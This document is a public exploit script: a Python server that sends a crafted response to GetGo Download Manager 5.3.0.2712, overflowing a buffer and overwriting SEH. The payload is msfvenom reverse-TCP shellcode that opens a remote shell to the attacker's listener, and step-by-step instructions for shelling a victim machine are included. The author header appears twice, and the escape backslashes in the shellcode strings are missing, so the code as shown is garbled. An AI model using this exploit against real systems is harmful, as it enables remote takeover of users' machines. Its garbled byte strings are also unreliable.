GetGo Download Manager 5.3.0.2712 Buffer Overflow

#!/usr/bin/python

#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: GetGo Download Manager 5.3.0.2712 - Remote Buffer Overflow (SEH)
# Date: 02-24-2018

#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: GetGo Download Manager 5.3.0.2712 - Remote Buffer Overflow (SEH)
# Date: 02-24-2018
# Vulnerable Software: GetGo Download Manager 5.3.0.2712
# Vendor Homepage: http://www.getgosoft.com/
# Version: 5.3.0.2712
# Software Link: https://www.exploit-db.com/apps/b26d82eadef93531f8beafac6105ef13-GetGoDMSetup.exe
# Tested On: Windows XP SP3
#
#
# PoC:
# 1. setup listener 443 on attacking machine
# 2. run script on attacking machine
# 3. open app on victim machine
# 4. go to download
# 5. select new, add http://attackerip to URL, index.html to File Name, and select OK
# 6. check listener, remote shell
#

import sys
import socket
import os
import time

host = "192.168.0.149"
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print " [+] listening on %d ..." % port

bz, addr = s.accept()
print "[+] connection accepted from %s" % addr[0]

junk = "A"*20

#jump 6
nseh = "xebx06x90x90"

#0x72d11f39 : pop edi # pop esi # ret 0x04 | {PAGE_EXECUTE_READ} [msacm32.drv]
seh = "x39x1fxd1x72"

#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.149 LPORT=443 -b "x00" -f c
#Payload size: 351 bytes
reverse = (
"xbax8fxf6x0ex24xd9xf7xd9x74x24xf4x58x33xc9xb1"
"x52x31x50x12x83xc0x04x03xdfxf8xecxd1x23xecx73"
"x19xdbxedx13x93x3exdcx13xc7x4bx4fxa4x83x19x7c"
"x4fxc1x89xf7x3dxcexbexb0x88x28xf1x41xa0x09x90"
"xc1xbbx5dx72xfbx73x90x73x3cx69x59x21x95xe5xcc"
"xd5x92xb0xccx5exe8x55x55x83xb9x54x74x12xb1x0e"
"x56x95x16x3bxdfx8dx7bx06xa9x26x4fxfcx28xeex81"
"xfdx87xcfx2dx0cxd9x08x89xefxacx60xe9x92xb6xb7"
"x93x48x32x23x33x1axe4x8fxc5xcfx73x44xc9xa4xf0"
"x02xcex3bxd4x39xeaxb0xdbxedx7ax82xffx29x26x50"
"x61x68x82x37x9ex6ax6dxe7x3axe1x80xfcx36xa8xcc"
"x31x7bx52x0dx5ex0cx21x3fxc1xa6xadx73x8ax60x2a"
"x73xa1xd5xa4x8ax4ax26xedx48x1ex76x85x79x1fx1d"
"x55x85xcaxb2x05x29xa5x72xf5x89x15x1bx1fx06x49"
"x3bx20xccxe2xd6xdbx87xccx8fxe3xc2xa5xcdxe3xed"
"x8ex5bx05x87xe0x0dx9ex30x98x17x54xa0x65x82x11"
"xe2xeex21xe6xadx06x4fxf4x5axe7x1axa6xcdxf8xb0"
"xcex92x6bx5fx0exdcx97xc8x59x89x66x01x0fx27xd0"
"xbbx2dxbax84x84xf5x61x75x0axf4xe4xc1x28xe6x30"
"xc9x74x52xedx9cx22x0cx4bx77x85xe6x05x24x4fx6e"
"xd3x06x50xe8xdcx42x26x14x6cx3bx7fx2bx41xabx77"
"x54xbfx4bx77x8fx7bx7bx32x8dx2ax14x9bx44x6fx79"
"x1cxb3xacx84x9fx31x4dx73xbfx30x48x3fx07xa9x20"
"x50xe2xcdx97x51x27")

fill = "D"*(4055 - len(reverse))

payload = junk + nseh + seh + reverse + fill

buffer = payload + " "
buffer+= payload + " "
buffer+= payload + " "

print bz.recv(1000)
bz.send(buffer)
print "[+] sending buffer ok "

time.sleep(3)
bz.close()
s.close()